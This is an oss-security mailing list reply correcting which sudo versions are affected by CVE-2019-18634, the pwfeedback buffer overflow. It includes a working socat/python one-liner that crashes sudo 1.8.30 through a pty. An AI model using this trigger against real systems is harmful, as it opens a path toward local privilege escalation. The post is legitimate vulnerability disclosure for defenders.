|
Message-ID: <CAPWJUny2yaenu_Kg7s4VhuL0nZ4Yg4XPN9HN75e5w0MU4brTnw@mail.gmail.com> Date: Wed, 5 Feb 2020 22:34:53 +1100 From: William Bowling <will@...wling.info> To: oss-security@...ts.openwall.com Subject: Re: CVE-2019-18634: buffer overflow in sudo when pwfeedback is enabled When using a pty, sudo_term_eof and sudo_term_kill are initialized to 0x4 and 0x15 allowing the overflow to be reached, making 1.8.26-1.8.30 also vulnerable: $ socat pty,link=/tmp/pty,waitslave exec:"python -c 'print((\"A\"*100+chr(0x15))*50)'" & $ sudo -S id < /tmp/pty [sudo] password for user1: Segmentation fault $ sudo -V Sudo version 1.8.30 Sudoers policy plugin version 1.8.30 Sudoers file grammar version 46 Sudoers I/O plugin version 1.8.30 - Will On Sat, Feb 1, 2020 at 12:59 AM Todd C. Miller <Todd.Miller@...o.ws> wrote: > On Thu, 30 Jan 2020 11:23:28 -0700, "Todd C. Miller" wrote: > > > Sudo versions affected: > > > > Sudo versions 1.7.1 to 1.8.30 inclusive are affected but only if > > the "pwfeedback" option is enabled in sudoers. > > It turns out a change in EOF handling introduced in sudo 1.8.26 > prevents exploitation of the bug. The EOF character is also > initialized to 0 and sudo 1.8.26 checks for EOF before it checks > for the kill character. > > This means that the bug actually affects sudo versions 1.7.1 to > 1.8.25p1 inclusive. > > Sorry for the oversight. I've updated the affected versions in > https://www.sudo.ws/alerts/pwfeedback.html > > - todd > -- GPG Key ID: 0x980F711A GPG Key Fingerprint: AA38 2A0E 7D22 18A9 6086 0289 41DC E04B 980F 711A
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.